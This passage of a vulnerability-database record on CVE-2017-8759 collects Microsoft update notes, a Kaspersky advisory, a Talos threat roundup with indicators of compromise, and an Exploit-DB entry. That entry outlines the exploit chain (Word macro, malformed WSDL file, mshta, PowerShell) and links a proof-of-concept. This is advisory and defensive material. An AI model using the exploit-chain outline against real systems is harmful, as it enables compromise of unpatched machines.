href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span><a id=\"appliestoproducts\" name=\"appliestoproducts\"></a>This article applies to the following:</span><br/>\u00a0</div><ul><li>Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2012</li></ul></li></ul></body></html>", "edition": 7, "modified": "2017-09-12T17:17:19", "id": "KB4041084", "href": "https://support.microsoft.com/en-us/help/4041084/", "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for the .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 for Windows Server 2012: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:38:39", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" 
id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978122\"><u>2978122</u></a>, and <a href=\"https://support.microsoft.com/help/2978126\"><u>2978126</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040973\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040973</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and for the .NET Framework 4.6 for Windows Server 2008 SP2: September 12, 2017</span></li><li><a data-content-id=\"4040977\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040977</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2: September 12, 2017</li><li><a data-content-id=\"4040978\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040978</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 2.0 SP2 for Windows Server 2008 SP2: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update 
FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span><a id=\"appliestoproducts\" name=\"appliestoproducts\"></a>This article applies to the following:</span><br/>\u00a0</div><ul><li>Microsoft .NET Framework 2.0 Service Pack 2, 4.5.2, and 4.6, when used with:<ul><li>Windows Server 2008 Service Pack 2</li></ul></li></ul></body></html>", "edition": 8, "modified": "2017-09-12T17:17:19", "id": "KB4041086", "href": "https://support.microsoft.com/en-us/help/4041086/", "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for the .NET Framework 2.0 SP2, 4.5.2, and 4.6 for Windows Server 2008 SP2: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:49:10", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" 
id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/4019112\"><u>4019112</u></a>, <a href=\"https://support.microsoft.com/help/4035036\"><u>4035036</u></a>, <a href=\"https://support.microsoft.com/help/4014981\"><u>4014981</u></a>, and <a href=\"https://support.microsoft.com/help/4032113\"><u>4032113</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security\u00a0update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040957\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040957</a>\u00a0Description of the Security Only update for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and for the .NET Framework 4.6 for Windows Server 2008 SP2: September 12, 2017</span></li><li><a data-content-id=\"4040960\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040960</a>\u00a0Description of the Security Only update for the .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2: September 12, 2017</li><li><a data-content-id=\"4040966\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040966</a>\u00a0Description of the Security Only update for the .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" 
href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span>This article applies to the following:</span></div><p>\u00a0</p><ul><li>Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows 7 Service Pack 1</li></ul></li></ul><div>\u00a0</div></body></html>", "edition": 3, "modified": "2017-09-12T17:17:18", "id": "KB4041090", "href": "https://support.microsoft.com/en-us/help/4041090/", "published": "2017-09-12T00:00:00", "title": "Security Only update for the .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:47:10", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code 
execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><div class=\"kb-summary-section section\"><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. 
To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</div><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li><span><span><span>All updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" target=\"_self\"><span><span><span>2919355</span></span></span></a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" target=\"_self\"><span><span><span>2919355</span></span></span></a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future</span></span></span>.</li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/4019114\"><u>4019114</u></a>, <a href=\"https://support.microsoft.com/help/4035038\"><u>4035038</u></a>, <a href=\"https://support.microsoft.com/help/4014983\"><u>4014983</u></a>, and <a href=\"https://support.microsoft.com/help/4032115\"><u>4032115</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security\u00a0update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040956\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040956</a>\u00a0Description of the Security Only update for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2: September 12, 2017</span></li><li><a data-content-id=\"4040958\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040958</a>\u00a0Description of the Security Only update for the .NET Framework 4.5.2 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</li><li><a data-content-id=\"4040967\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040967</a>\u00a0Description of the Security Only update for the .NET Framework 3.5 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" 
target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span>This article applies to the following:</span></div><p>\u00a0</p><ul><li>Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2012 R2</li><li>Windows RT 8.1</li><li>Windows 8.1</li></ul></li></ul><div>\u00a0</div></body></html>", "edition": 3, "modified": "2017-09-12T17:17:18", "id": "KB4041092", "href": "https://support.microsoft.com/en-us/help/4041092/", "published": "2017-09-12T00:00:00", "title": "Security Only update for the .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 updates for Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:35:17", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div 
class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. 
Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/4019113\"><u>4019113</u></a>, <a href=\"https://support.microsoft.com/help/4035037\"><u>4035037</u></a>, <a href=\"https://support.microsoft.com/help/4014982\"><u>4014982</u></a>, and <a href=\"https://support.microsoft.com/help/4032114\"><u>4032114</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security\u00a0update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040955\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040955</a>\u00a0Description of the Security Only update for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows Server 2012: September 12, 2017</span></li><li><a data-content-id=\"4040959\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040959</a>\u00a0Description of the Security Only update for the .NET Framework 4.5.2 for Windows Server 2012: September 12, 2017</li><li><a data-content-id=\"4040965\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040965</a>\u00a0Description of the Security Only update for the .NET Framework 3.5 for Windows Server 2012: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" 
target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span>This article applies to the following:</span></div><p>\u00a0</p><ul><li>Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2012</li></ul></li></ul><div>\u00a0</div></body></html>", "edition": 3, "modified": "2017-09-12T17:17:18", "id": "KB4041091", "href": "https://support.microsoft.com/en-us/help/4041091/", "published": "2017-09-12T00:00:00", "title": "Security Only update for the .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 for Windows Server 2012: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-09-13T20:42:41", "description": "Microsoft Windows .NET Framework - Remote Code Execution. CVE-2017-8759. 
Remote exploit for Windows platform", "published": "2017-09-13T00:00:00", "type": "exploitdb", "title": "Microsoft Windows .NET Framework - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8759"], "modified": "2017-09-13T00:00:00", "id": "EDB-ID:42711", "href": "https://www.exploit-db.com/exploits/42711/", "sourceData": "Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample\r\n\r\nRunning CVE-2017-8759 exploit sample.\r\n\r\nFlow of the exploit:\r\n\r\nWord macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe, which in turn runs a powershell command that runs mspaint.exe.\r\n\r\nTo test:\r\n\r\nRun a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080\r\n\r\nIf all is good mspaint should run.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42711.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42711/"}], "kaspersky": [{"lastseen": "2020-09-02T11:45:40", "bulletinFamily": "info", "cvelist": ["CVE-2017-8759"], "description": "### *Detect date*:\n09/12/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn improper validation of untrusted input was found in Microsoft .NET Framework. By exploiting this vulnerability malicious users can execute arbitrary code. 
This vulnerability can be exploited remotely via a specially designed document or application.\n\n### *Affected products*:\nMicrosoft .NET Framework 4.7 \nMicrosoft .NET Framework 2.0 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 4.6.1 \nMicrosoft .NET Framework 4.6.2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) \n[CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2017-8759](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4040955](<http://support.microsoft.com/kb/4040955>) \n[4040956](<http://support.microsoft.com/kb/4040956>) \n[4040957](<http://support.microsoft.com/kb/4040957>) \n[4040958](<http://support.microsoft.com/kb/4040958>) \n[4040959](<http://support.microsoft.com/kb/4040959>) \n[4040960](<http://support.microsoft.com/kb/4040960>) \n[4040964](<http://support.microsoft.com/kb/4040964>) \n[4040965](<http://support.microsoft.com/kb/4040965>) \n[4040966](<http://support.microsoft.com/kb/4040966>) \n[4040967](<http://support.microsoft.com/kb/4040967>) \n[4040971](<http://support.microsoft.com/kb/4040971>) \n[4040972](<http://support.microsoft.com/kb/4040972>) 
\n[4040973](<http://support.microsoft.com/kb/4040973>) \n[4040974](<http://support.microsoft.com/kb/4040974>) \n[4040975](<http://support.microsoft.com/kb/4040975>) \n[4040977](<http://support.microsoft.com/kb/4040977>) \n[4040978](<http://support.microsoft.com/kb/4040978>) \n[4040979](<http://support.microsoft.com/kb/4040979>) \n[4040980](<http://support.microsoft.com/kb/4040980>) \n[4040981](<http://support.microsoft.com/kb/4040981>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "edition": 39, "modified": "2020-06-18T00:00:00", "published": "2017-09-12T00:00:00", "id": "KLA11101", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11101", "title": "\r KLA11101Arbitrary code execution vulnerability in Microsoft .NET Framework ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2018-01-29T19:59:50", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "Today, Talos is publishing a glimpse into the most prevalent threats we've observed between December 29 and January 05. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nThe most prevalent threats highlighted in this round up are: \n \n\n\n * **Doc.Downloader.Trickbot-6412300-1** \nOffice Macro Downloader \nThis downloader was submitted to ThreatGrid more than 50 times on December 26. 
This office document downloads a multi-payload Trickbot loader. This post-Christmas gift is not something that somebody just back from the holiday wants to open. \n \n * **Doc.Dropper.Agent-6412231-0** \nOffice Macro Downloader \nThis is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. The sample was unable to download the next stage, so no further analysis is available. \n \n * **Doc.Macro.Necurs-6412436-0** \nDownloader \nAnother wave of OLE-based downloaders spiked in prevalence just prior to the new year. The samples use obfuscated VBA macros to download various malware families distributed for the Necurs botnet, including Locky. \n \n * **Ppt.Downloader.CVE_2017_8759-6413368-0** \nOffice Macro Downloader \nThese PowerPoint files contain an XML file, located in ppt/slides/_rels/slide1.xml.rels, with a malicious SOAP WSDL definition that leverages CVE-2017-8759. If the file is saved as a PPSX, the slideshow will automatically start on opening, triggering the malicious code. \n \n * **Win.Ransomware.PolyRansom-6413978-0** \nRansomware \nPolyRansom variants continue to thrive in 2018. PolyRansom is polymorphic ransomware that spreads by infecting other executables. It gains persistence through an installed service and run keys added to the registry. Its primary infection vectors are shared network drives, removable media, and email. \n \n * **Win.Trojan.Generic-6414413-0** \nTrojan \nThis cluster provides generic detection for the Emotet Trojan downloaded onto a target's machine. Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products. \n \n * **Win.Trojan.Multi-6413508-0** \nTrojan \nThis trojan will potentially connect to one or more servers to receive instructions and download additional malware. 
* * *

## Threats

### Doc.Downloader.Trickbot-6412300-1

#### Indicators of Compromise

**Registry Keys**

* N/A

**Mutexes**

* 316D1C7871E00
* Global\552FFA80-3393-423d-8671-7BA046BB5906
* \BaseNamedObjects\C1A8DFE67F9832960

**IP Addresses**

* 89[.]161[.]153[.]74

**Domain Names**

* jas-pol[.]com[.]pl

**Files and or directories created**

* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\Inue8.bat
* %AppData%\localservice\Wn-lbzpms.exe
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\mo-r.exe
* %AppData%\localservice\mo-r.exe
* %TEMP%\Ecmjtqf.bat
* %AppData%\localservice\Modules\injectDll64_configs\sinj
* %AppData%\localservice\Modules\injectDll64_configs\dinj
* %TEMP%\Wn-lbzpms.exe

**File Hashes**

* 3e5a5c672052182d9d10b0d094f07ec67f182939556c90f66236d75d4e795cd6
* 07a1d83e2fdce0b0383fc05e2931d3aa557e3eeeeca50762258431ecf6fc2c50

#### Coverage

[](<https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png>)

#### Screenshots of Detection

**AMP**

[](<https://4.bp.blogspot.com/-BXqVeU9qBGM/Wk_T-zvobmI/AAAAAAAABlA/VKop4GvYskIai2FuJRRfiWrDBKUt9kqlgCLcBGAs/s1600/Doc_Trojan_XMasInvoice_6412300_0_amp.png>)

